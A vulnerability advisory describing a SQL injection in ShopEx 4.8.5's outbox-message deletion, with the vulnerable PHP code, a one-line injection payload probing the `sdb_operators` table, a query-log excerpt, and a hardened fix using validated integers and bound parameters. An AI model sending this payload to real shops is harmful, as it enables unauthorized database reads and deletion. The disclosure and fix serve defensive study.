ShopEx injection vulnerability #3

Published: 2025-04-13
Revised: 2025-04-13

### Brief description:

A boring SQL injection. Tested version: shopex-singel-4.8.5.78660

### Details:

In the file `\core\shop\controller\ctl.member.php`:

```
function delOutBoxMsg() {
    if(!empty($_POST['deloutbox'])){
        $oMsg = &$this->system->loadModel('resources/msgbox');
        // $_POST['deloutbox'] is passed to the model without any validation
        $oMsg->delOutBoxMsg($_POST['deloutbox']);
        $this->splash('success', $this->system->mkUrl("member","outbox"), __('删除成功'));
    }else{
        $this->splash('failed', $this->system->mkUrl("member","outbox"), __('删除失败: 没有选中任何记录!'));
    }
}
```

The same problem as in ShopEx injection vulnerability #2:

```
public function delOutBoxMsg( $aMsgId )
{
    foreach ( $aMsgId as $val )
    {
        if ( $val )
        {
            $aTmp[] = $val;
        }
    }
    if ( $aTmp )
    {
        // each array element is concatenated into the IN (...) list as raw SQL text
        $this->db->exec( "DELETE FROM sdb_message WHERE msg_id IN (".implode( ",", $aTmp ).")" );
    }
    return true;
}
```

Submit: `deloutbox[1]=1) and (select count(*) from sdb_operators)=1%23`

```
130526 20:49:28   372 Connect   root@localhost on
                  372 Init DB   shopex
                  372 Query     SET NAMES 'utf8'
                  372 Query     SELECT * FROM sdb_plugins WHERE plugin_type="app"
                  372 Query     select * from sdb_plugins where plugin_type="app" and...
```
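
A hardened form of the model method above, as an added example that is not ShopEx code: every element of `deloutbox` must validate as a positive integer, and the IDs reach the `DELETE` only as bound parameters. It assumes PDO with an in-memory SQLite table standing in for ShopEx's own `$this->db` wrapper and `sdb_message`; the `$db` parameter and `cleanMsgIds()` helper are hypothetical names.

```php
<?php
// Added example, not ShopEx code. Assumption: PDO with in-memory SQLite stands
// in for ShopEx's own $this->db wrapper; the $db parameter is hypothetical.

/** Return the IDs as ints, or throw if any element is not a positive integer. */
function cleanMsgIds($raw): array
{
    if (!is_array($raw) || $raw === []) {
        throw new InvalidArgumentException('deloutbox must be a non-empty array');
    }
    $ids = [];
    foreach ($raw as $val) {
        // FILTER_VALIDATE_INT rejects arrays, trailing SQL, floats and overflow.
        $id = filter_var($val, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($id === false) {
            throw new InvalidArgumentException('invalid msg_id in deloutbox');
        }
        $ids[$id] = $id; // de-duplicate
    }
    return array_values($ids);
}

function delOutBoxMsg(PDO $db, $aMsgId): int
{
    $ids = cleanMsgIds($aMsgId);
    // One "?" per ID: values travel as bound parameters, never as SQL text.
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("DELETE FROM sdb_message WHERE msg_id IN ($marks)");
    $stmt->execute($ids);
    return $stmt->rowCount();
}

// Constructed demo table and rows.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE sdb_message (msg_id INTEGER PRIMARY KEY, subject TEXT)');
$db->exec("INSERT INTO sdb_message VALUES (1, 'a'), (2, 'b'), (3, 'c')");

// The reported request value after URL decoding (%23 is "#").
$reported = [1 => '1) and (select count(*) from sdb_operators)=1#'];
try {
    delOutBoxMsg($db, $reported);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
echo "deleted: ", delOutBoxMsg($db, ['1', '3']), "\n";
echo "remaining: ", $db->query('SELECT COUNT(*) FROM sdb_message')->fetchColumn(), "\n";
```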
